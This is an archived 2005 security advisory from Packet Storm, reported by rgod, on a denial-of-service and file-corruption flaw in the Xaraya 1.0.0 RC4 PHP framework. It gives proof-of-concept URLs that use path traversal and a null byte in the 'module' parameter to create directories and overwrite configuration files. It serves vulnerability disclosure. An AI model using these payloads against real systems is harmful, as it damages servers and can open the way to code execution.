xarayaDOS.txt

2005-12-02T00:00:00
ID PACKETSTORM:42009
Type packetstorm
Reporter rgod
Modified 2005-12-02T00:00:00

Description

                                        
                                            `Xaraya <= 1.0.0 RC4 D.O.S / file corruption  
  
software:  
site: http://www.xaraya.com  
description: "Xaraya 1.0 Core is an Open Source web application framework  
written in PHP"  
  
vulnerable code in create() function in xarMLSXML2PHPBackend.php:  
  
  
  
i) you can create an empty dir, in some cases this leads to D.O.S. condition,poc:  
  
http://[target]/[path_to_xaraya]/index.php?module=../../../../.key.php  
http://[target]/[path_to_xaraya]/index.php?module=../../../../../.htaccess  
  
  
  
  
ii) you can overwite any file on target system, using null char  
  
example, D.O.S, overwriting a system file:  
  
http://[target]/[path_to_xaraya]/index.php?module=../../../../config.system.php%00  
  
this could lead to remode code execution condition even, if a user overwrite  
some file where an inclusion path is defined  
  
  
  
  
  
rgod  
site: http://rgod.altervista.org  
mail: retrogod at aliceposta it  
original advisory: http://rgod.altervista.org/xaraya1DOS.hmtl  
`